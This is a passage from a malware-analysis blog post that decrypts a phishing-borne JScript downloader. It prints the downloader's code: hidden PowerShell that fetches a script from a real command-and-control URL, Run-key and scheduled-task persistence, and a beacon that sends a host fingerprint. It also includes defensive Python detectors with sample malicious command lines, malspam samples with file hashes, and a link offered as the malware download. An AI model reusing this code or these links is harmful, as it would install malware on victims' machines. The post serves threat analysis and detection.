Now we go through the actual code that is executed to download the payload. Things get interesting here: the code is encrypted with a running XOR, and decryption happens only at execution time. Once decrypted, the code runs, downloads the payload and executes it. Again, I've used the console.log method to print out the decrypted version of the code and the other interesting bits that follow. </div>
<div style="text-align: left;">
<br /></div>
<a href="http://3.bp.blogspot.com/-EFI6DgLKIz0/WPgIUI_0oGI/AAAAAAAAMsI/l6QduucZ9xIx-8Bj2TcRmRkbUAe63sG-gCK4B/s1600/second_stage_debugging.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="264" src="https://3.bp.blogspot.com/-EFI6DgLKIz0/WPgIUI_0oGI/AAAAAAAAMsI/l6QduucZ9xIx-8Bj2TcRmRkbUAe63sG-gCK4B/s640/second_stage_debugging.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Second stage debugging</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Below is a screenshot of the decrypted code after execution; this is the code that checks a few things on the host system, runs a couple of loops and eventually downloads the payload. </div>
<br /><a href="http://2.bp.blogspot.com/-n2VsIqQjbjE/WPgK-T9mELI/AAAAAAAAMsg/LFueb5Fgr9kQ4STE6uqMbdIqA_BLu98dwCK4B/s1600/second_stage_results.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="264" src="https://2.bp.blogspot.com/-n2VsIqQjbjE/WPgK-T9mELI/AAAAAAAAMsg/LFueb5Fgr9kQ4STE6uqMbdIqA_BLu98dwCK4B/s640/second_stage_results.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Second Stage Results</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Below is the code extracted after decryption of the second-stage downloader:</div>
<br /><a href="http://4.bp.blogspot.com/-g8IA1vIpi3U/WPgJ8uhfpsI/AAAAAAAAMsU/-vqVXRe6XLIEB9Td4glmiC5SBVIE4ABBQCK4B/s1600/second_stage_result.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-decoration-line: none;"><img border="0" height="172" src="https://4.bp.blogspot.com/-g8IA1vIpi3U/WPgJ8uhfpsI/AAAAAAAAMsU/-vqVXRe6XLIEB9Td4glmiC5SBVIE4ABBQCK4B/s640/second_stage_result.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Second Stage CODE</span></td></tr>
</tbody></table>
<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="border-collapse: collapse; border-spacing: 0px; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="padding: 0px;"><div style="text-align: left;">
Below is the final JS code that will download the payload from the malNet:<a href="http://1.bp.blogspot.com/-UFYtIN2QvM0/WPgMarIgQFI/AAAAAAAAMss/gPJ_R2xK6HcW3A5K2UFKnnia9BuHe5FvACK4B/s1600/final_JS.png" imageanchor="1" style="background: transparent; color: #25a186; cursor: pointer; display: inline-block; margin-left: auto; margin-right: auto; text-align: center; text-decoration-line: none;"><img border="0" height="212" src="https://1.bp.blogspot.com/-UFYtIN2QvM0/WPgMarIgQFI/AAAAAAAAMss/gPJ_R2xK6HcW3A5K2UFKnnia9BuHe5FvACK4B/s640/final_JS.png" style="border: 0px; height: auto; max-width: 100%;" width="640" /></a></div>
</td></tr>
<tr><td class="tr-caption" style="padding: 0px;"><span style="font-size: x-small;">Final JS Code</span><br /><span style="font-size: x-small;"><br /></span><br /><div style="text-align: left;">
<span style="font-size: x-small;">Here is the final JS code with interesting bits in comments:</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #1</span></b></div>
<div style="text-align: left;">
<b><span style="font-size: x-small;"><br /></span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var ZGncoNX <span class="Apple-tab-span" style="white-space: pre;"> </span>= new ActiveXObject('WScript.Shell');</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var yiwUiaBBet = 600000;</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////CPwSorFGbw9A</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////5f2PK8sWYO22cgXwhsZX</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var XvHMKvYV <span class="Apple-tab-span" style="white-space: pre;"> </span>= "http://www.volf.de/term.php";</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var xDUceoXahcbBJx0<span class="Apple-tab-span" style="white-space: pre;"> </span> <span class="Apple-tab-span" style="white-space: pre;"> </span>= ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%');</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var xDUceoXahcbBJx1 = "u1"</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var xDUceoXahcbBJx2 = ZGncoNX.ExpandEnvironmentStrings('%PROCESSOR_REVISION%%PROCESSOR_ARCHITECTURE%%COMPUTERNAME%%USERNAME%');</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////wK3LkavxMH</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////ffYP3PnSvRGt</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">WScript.Echo('x2 in this code is =' + xDUceoXahcbBJx2);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">xDUceoXahcbBJx2 += xDUceoXahcbBJx;</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">var xDUceoXahcbBJx3 = "";</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////UP1WM4uKv</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">//////9SuE9DJo4Ar9knha6L</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">for (var xDUceoXahcbBJx4 = 0; xDUceoXahcbBJx4 < xDUceoXahcbBJx2.length; xDUceoXahcbBJx4++) {</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>xDUceoXahcbBJx3 += xDUceoXahcbBJx2.charCodeAt(xDUceoXahcbBJx4).toString(16);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">};</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* ---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;"> xDUceoXahcbBJx3 - this is the ID that is sent back to the C2:</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #2</span></b></div>
<div style="text-align: left;">
<b><span style="font-size: x-small;"><br /></span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span style="background-color: yellow;">ZGncoNX.Run</span>('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '0" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile(\'' + XvHMKvYV + '?cmd=d\',\'%userprofile%\\' + xDUceoXahcbBJx0 + '.js\'); %userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* ---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;">ZGncoNX.Run - OUTPUT:</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46010" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://www.volf.de/term.php?cmd=d','%userprofile%\4601.js'); %userprofile%\<b>4601.js</b>"</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #3</span></b></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;"><br /></span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span style="background-color: yellow;">ZGncoNX.Run</span>('REG ADD "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" /V "' + xDUceoXahcbBJx0 + '1" /t REG_SZ /F /D "%userprofile%\\' + xDUceoXahcbBJx0 + '.js"', 0, false);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;">ZGncoNX.Run</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46011" /t REG_SZ /F /D "%userprofile%\4601.js"</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span style="background-color: #eeeeee;"></span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #4</span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><span style="background-color: yellow;">ZGncoNX.Run</span>('SCHTASKS /Create /TN ' + xDUceoXahcbBJx0 + ' /SC DAILY /F /TR %userprofile%\\' + xDUceoXahcbBJx0 + '.js', 0, false);</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* ---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;">ZGncoNX.Run</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">SCHTASKS /Create /TN 4601 /SC DAILY /F /TR %userprofile%\4601.js</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
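<div style="text-align: left;">Snippets #2 to #4 are the persistence chain: two Run-key values and a daily scheduled task, all pointing at a script in the user profile, with the first value also re-downloading that script through a hidden, policy-bypassing PowerShell one-liner. The following is an added example, not code from this post or from the malware, of how a defender can flag that chain in process-creation command lines (Sysmon event ID 1 or Windows Security event 4688). The sample command lines, the domain c2.example.invalid and the tag names are constructed for the example.</div>

```python
"""Flag the persistence chain from Snippets #2-#4 in process-creation logs.

Added example, not code from the post or the malware. The sample command
lines and the domain c2.example.invalid are constructed.
"""
import re
from dataclasses import dataclass

# A REG ADD that targets the per-user Run key (Snippets #2 and #3).
RUN_KEY_ADD = re.compile(
    r"\bREG\s+ADD\s+\"?HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\b",
    re.IGNORECASE,
)
# A hidden / policy-bypassing PowerShell that calls WebClient.DownloadFile
# (the data written by Snippet #2's Run value).
PS_DOWNLOAD = re.compile(
    r"powershell(?:\.exe)?\b.*?(?:-ExecutionPolicy\s+bypass|-windowstyle\s+hidden)"
    r".*?DownloadFile\(",
    re.IGNORECASE | re.DOTALL,
)
# A scheduled task whose action is a script sitting in the user profile
# (Snippet #4).
SCHTASKS_PROFILE_SCRIPT = re.compile(
    r"\bSCHTASKS\s+/Create\b.*?/TR\s+\"?%userprofile%\\[^\s\"']+\.(?:js|jse|vbs|wsf)\b",
    re.IGNORECASE,
)
# Any script path under %userprofile%, collected so the analyst can pivot on it.
SCRIPT_IN_PROFILE = re.compile(
    r"%userprofile%\\[^\s\"']+\.(?:js|jse|vbs|wsf)\b", re.IGNORECASE
)

CHAIN = {"hkcu_run_key_add", "powershell_downloadfile", "schtasks_userprofile_script"}


@dataclass
class Finding:
    line_no: int
    tags: list
    script_paths: list


def classify(cmdline):
    """Return the technique tags that match one command line (possibly none)."""
    tags = []
    if RUN_KEY_ADD.search(cmdline):
        tags.append("hkcu_run_key_add")
    if PS_DOWNLOAD.search(cmdline):
        tags.append("powershell_downloadfile")
    if SCHTASKS_PROFILE_SCRIPT.search(cmdline):
        tags.append("schtasks_userprofile_script")
    return tags


def scan(cmdlines):
    """Classify every command line; keep only those with at least one tag."""
    findings = []
    for n, line in enumerate(cmdlines, 1):
        tags = classify(line)
        if tags:
            paths = sorted(set(SCRIPT_IN_PROFILE.findall(line)))
            findings.append(Finding(n, tags, paths))
    return findings


def chain_complete(findings):
    """True when all three techniques of the Snippet #2-#4 chain were seen."""
    seen = set()
    for finding in findings:
        seen.update(finding.tags)
    return CHAIN.issubset(seen)


# Constructed command lines, modelled on the output shown in Snippets #2-#4,
# plus three benign ones that must not fire.
SAMPLE_CMDLINES = [
    r'''REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46010" /t REG_SZ /F /D "cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.Webclient).DownloadFile('http://c2.example.invalid/term.php?cmd=d','%userprofile%\4601.js'); %userprofile%\4601.js"''',
    r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "46011" /t REG_SZ /F /D "%userprofile%\4601.js"',
    r"SCHTASKS /Create /TN 4601 /SC DAILY /F /TR %userprofile%\4601.js",
    r'REG ADD "HKCU\Software\Contoso\App" /V Installed /t REG_DWORD /D 1 /F',
    r'SCHTASKS /Create /TN NightlyBackup /SC DAILY /TR "C:\Program Files\Backup\backup.exe"',
    r"powershell.exe -NoProfile -Command Get-Process",
]


if __name__ == "__main__":
    results = scan(SAMPLE_CMDLINES)
    for finding in results:
        print(finding.line_no, finding.tags, finding.script_paths)
    print("full chain present:", chain_complete(results))
```

<div style="text-align: left;">The patterns are deliberately narrow: the task rule only fires when the action is a script under %userprofile%, and the PowerShell rule needs both a policy-bypass or hidden-window switch and a DownloadFile call, so ordinary administrative REG and SCHTASKS use stays quiet. The script path is extracted as a pivot value, which is what links the three events to one implant on the host.</div>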
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #5</span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">This one is the XOR-encrypted code; it looks something like this:</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">xDUceoXahcbBJx5.WriteText('var UDyUWGgURHBZ = "\\x3e\\x17\\x41\\x64\\x1d\\x0f\\x7e\\x45\\x6d\\x20\\x22\\x58\\x2b\\x07\\x3f\\x46\\x64\\x45\\x68\\x13\\x12\\x0c\\.......</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<b style="background-color: #eeeeee;"><span style="font-size: x-small;">Snippet #6</span></b></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">xDUceoXahcbBJx6.open('GET', XvHMKvYV + '?cmd=p&id=' + xDUceoXahcbBJx3 + '&group=' + xDUceoXahcbBJx1 + '&os=' + xDUceoXahcbBJx + '&rnd=' + Math.random(), false);</span></div>
<div style="text-align: left;">
<span class="Apple-tab-span" style="white-space: pre;"><span style="font-size: x-small;"> </span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">/* ---------------------------</span></div>
<div style="text-align: left;">
<span style="background-color: yellow;"><span style="font-size: x-small;">EndResult:</span></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">http://www.volf.de/term.php?cmd=p&id=3436303178383657494e2d5036335533454d4835514356697368616c205468616b7572&group=u1&os=&rnd=0.06770346768653279</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">---------------------------</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"> */</span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">That's all. </span></div>
<div style="text-align: left;">
<span style="font-size: x-small;">:)</span></div>
</td></tr>
</tbody></table>
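<div style="text-align: left;">Snippet #1 builds the victim ID by concatenating PROCESSOR_REVISION, PROCESSOR_ARCHITECTURE, COMPUTERNAME and USERNAME and hex-encoding each character with charCodeAt().toString(16); Snippet #6 then sends it in the check-in URL, with a random rnd value as a cache-buster. Below is an added example, not code from this post or from the malware, that reverses that encoding for a captured check-in URL and picks such check-ins out of proxy log lines, so the decoded id can be used to pivot across hosts. The environment values, the domain c2.example.invalid and the proxy log lines are constructed for the example.</div>

```python
"""Decode the check-in URL shape seen in Snippets #1 and #6.

Added example, not code from the post or the malware. Every sample value
below (environment strings, domain, proxy log lines) is constructed.
"""
from urllib.parse import parse_qs, urlsplit


def encode_id(processor_revision, architecture, computername, username):
    """Rebuild the id the way Snippet #1 does: concatenate the four
    environment strings and hex-encode each character code.

    JScript's toString(16) does not zero-pad, so the result only round-trips
    for printable ASCII, where every code is two hex digits anyway."""
    raw = processor_revision + architecture + computername + username
    return "".join(format(ord(ch), "x") for ch in raw)


def decode_id(hex_id):
    """Inverse of encode_id; None when the value is empty or is not a clean
    sequence of two-digit ASCII codes (odd length, non-hex, non-ASCII)."""
    if not hex_id:
        return None
    try:
        return bytes.fromhex(hex_id).decode("ascii")
    except ValueError:
        return None


def _first(query, key):
    """First value of a query parameter, or '' when absent."""
    return query.get(key, [""])[0]


def parse_beacon(url):
    """Split a check-in URL into its parts and decode the id field."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    return {
        "host": parts.hostname,
        "path": parts.path,
        "cmd": _first(query, "cmd"),
        "group": _first(query, "group"),
        "os": _first(query, "os"),
        "id_hex": _first(query, "id"),
        "fingerprint": decode_id(_first(query, "id")),
        "has_rnd": "rnd" in query,
    }


def looks_like_checkin(parsed):
    """True for the shape in Snippet #6: cmd=p, a decodable id, a group tag
    and the rnd cache-buster. The cmd=d download request carries no id and
    is too generic to flag on its own."""
    return (
        parsed["cmd"] == "p"
        and parsed["fingerprint"] is not None
        and parsed["group"] != ""
        and parsed["has_rnd"]
    )


# Constructed sample host and the id it would produce.
SAMPLE_ID = encode_id("1e03", "AMD64", "DESKTOP-LAB01", "analyst")
SAMPLE_BEACON = (
    "http://c2.example.invalid/term.php?cmd=p&id=" + SAMPLE_ID
    + "&group=u1&os=&rnd=0.3141"
)

# Constructed proxy log lines: timestamp, client IP, method, URL.
SAMPLE_PROXY_LOG = [
    "2017-04-19T10:01:02Z 10.0.0.12 GET " + SAMPLE_BEACON,
    "2017-04-19T10:01:05Z 10.0.0.12 GET http://c2.example.invalid/term.php?cmd=d",
    "2017-04-19T10:02:00Z 10.0.0.15 GET http://www.example.com/index.html",
]


def find_checkins(lines):
    """Return (client_ip, decoded fingerprint) for every line whose URL has
    the check-in shape; the decoded string is the pivot value for hunting."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) != 4:
            continue
        parsed = parse_beacon(fields[3])
        if looks_like_checkin(parsed):
            hits.append((fields[1], parsed["fingerprint"]))
    return hits


if __name__ == "__main__":
    for ip, fingerprint in find_checkins(SAMPLE_PROXY_LOG):
        print(ip, fingerprint)
```

<div style="text-align: left;">Because the id is a fixed function of the host and user, it stays the same across every check-in from that machine while rnd changes, which is why the decoded value, not the full URL, is the right thing to search for in proxy history. Note that the four fields are concatenated without a separator, so the decoded string cannot be split back into its parts reliably; compare it whole.</div>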
</div>
<b>Updated (2016-06-28)</b><br />This one is dishing out crypt0 through a JS attachment in the phish.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="body undoreset" id="yui_3_16_0_ym19_1_1467107463214_5420" style="-webkit-padding-start: 0px; box-sizing: border-box; display: table; outline: none 0px; padding-left: 0px; padding-top: 12px; width: 836px;" tabindex="0">
<div class="email-wrapped" id="yui_3_16_0_ym19_1_1467107463214_5419" style="-webkit-padding-start: 0px; display: table-cell; width: auto; word-break: break-word; word-wrap: break-word;">
Dear victim,<br />
<br style="-webkit-padding-start: 0px;" />
Attached please find the documents you requested..<br />
<br style="-webkit-padding-start: 0px;" />
<br style="-webkit-padding-start: 0px;" />
<br style="-webkit-padding-start: 0px;" />
King regards<br />
Liza Hale<br />
VP Analytic Services<br />
Tue, 28 Jun 2016 08:25:45 +0300</div>
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://4.bp.blogspot.com/-Az4jmyCKHxU/V3JaMSmO4RI/AAAAAAAAAEI/_Hee1mm1pPwn2sBPukqJLsoBRMCDqgnHgCKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.04.31%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="120" src="https://4.bp.blogspot.com/-Az4jmyCKHxU/V3JaMSmO4RI/AAAAAAAAAEI/_Hee1mm1pPwn2sBPukqJLsoBRMCDqgnHgCKgB/s320/Screen%2BShot%2B2016-06-28%2Bat%2B9.04.31%2Bpm.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="body undoreset" id="yui_3_16_0_ym19_1_1467107463214_5420" style="-webkit-padding-start: 0px; box-sizing: border-box; display: table; outline: none 0px; padding-left: 0px; padding-top: 12px; width: 836px;" tabindex="0">
<div class="email-wrapped" id="yui_3_16_0_ym19_1_1467107463214_5419" style="-webkit-padding-start: 0px; display: table-cell; width: auto; word-break: break-word; word-wrap: break-word;">
<br />
Here's some info on this one:<br />
<br />
MD5: 24966b6f6301fda044065aaf29a28158 (zip attachment)<br />
MD5: 0e580534f13c21daf6466d433464a014 (the JS file in the attachment)</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-Yr0CsJ9zzYs/V3Jbg_4RGrI/AAAAAAAAAEc/P0xF8_fPw284v9S08Oeyt_F9dsRSkxbfgCKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.57%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://3.bp.blogspot.com/-Yr0CsJ9zzYs/V3Jbg_4RGrI/AAAAAAAAAEc/P0xF8_fPw284v9S08Oeyt_F9dsRSkxbfgCKgB/s640/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.57%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="https://1.bp.blogspot.com/-BQpfDEdhhLE/V3JbjdfUjOI/AAAAAAAAAEk/MYXj3oUddvcPDhnHU8BKX8VhM5s81RYvACKgB/s640/Screen%2BShot%2B2016-06-28%2Bat%2B9.10.32%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8FTtzfh3mlo/V3JbeyamUII/AAAAAAAAAEs/h6pGoN52-J4_mhUVHtdzCX8IVRO0rPM7QCKgB/s1600/Screen%2BShot%2B2016-06-28%2Bat%2B9.11.17%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="394" src="https://4.bp.blogspot.com/-8FTtzfh3mlo/V3JbeyamUII/AAAAAAAAAEs/h6pGoN52-J4_mhUVHtdzCX8IVRO0rPM7QCKgB/s640/Screen%2BShot%2B2016-06-28%2Bat%2B9.11.17%2Bpm.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b>Updated document (2016-06-27)</b><div class="separator" style="clear: both; text-align: center;">
</div>
<div class="body undoreset" id="yui_3_16_0_ym19_1_1467026854406_2606" style="-webkit-padding-start: 0px; background-color: white; box-sizing: border-box; display: table; font-family: 'Helvetica Neue', 'Segoe UI', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 13px; padding-left: 0px; padding-top: 12px; width: 843px;" tabindex="0">
<div class="email-wrapped" id="yui_3_16_0_ym19_1_1467026854406_2605" style="-webkit-padding-start: 0px; display: table-cell; width: auto; word-break: break-word; word-wrap: break-word;">
Dear john,<br />
<br style="-webkit-padding-start: 0px;" />
The reference you requested is attached.<br />
Let me know if you have any questions.<br />
<br style="-webkit-padding-start: 0px;" />
Best regards<br />
<br style="-webkit-padding-start: 0px;" />
Josefa Abbott<br />
Group Managing Director<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://3.bp.blogspot.com/-PxSLcFLfYxY/V3EO7XZuWcI/AAAAAAAAAD4/DhluDsNGvzs6RnViLXIkyvccG525NXiyACKgB/s1600/Screen%2BShot%2B2016-06-27%2Bat%2B9.32.54%2Bpm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="296" src="https://3.bp.blogspot.com/-PxSLcFLfYxY/V3EO7XZuWcI/AAAAAAAAAD4/DhluDsNGvzs6RnViLXIkyvccG525NXiyACKgB/s320/Screen%2BShot%2B2016-06-27%2Bat%2B9.32.54%2Bpm.png" width="320" /></a></div>
<br />
<br /></div>
</div>
<b>MalSpam: Price list (2016-04-28)</b><br /><span style="font-family: Arial, Helvetica, sans-serif;">Sender: RogersJeff13451@jazztel.es</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-0Y1dLyKaiIk/VyH1UNZxQPI/AAAAAAAAACE/CpduLaCtKmsM4H3-WG9W1tuEv1_6Vl6kQCLcB/s1600/bill.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://3.bp.blogspot.com/-0Y1dLyKaiIk/VyH1UNZxQPI/AAAAAAAAACE/CpduLaCtKmsM4H3-WG9W1tuEv1_6Vl6kQCLcB/s1600/bill.png" /></span></a></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Download the file <a href="https://drive.google.com/file/d/0B131CgkpMDDKOHU2QWVuek1PMkE/view?usp=sharing">here</a>. </span></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br /><b>NEWS: An $80M Bank Hack Has Been Blamed on $10 Routers (2016-04-26)</b><br /><span style="background-color: white; color: #222222; font-family: ElizabethSerif, Georgia, serif; font-size: 16px; line-height: 29px;">Sometimes it pays to spend. The central bank of Bangladesh has found that out the hard way, as police are blaming its loss of $80m during a hack on crappy $10 routers.</span><br />
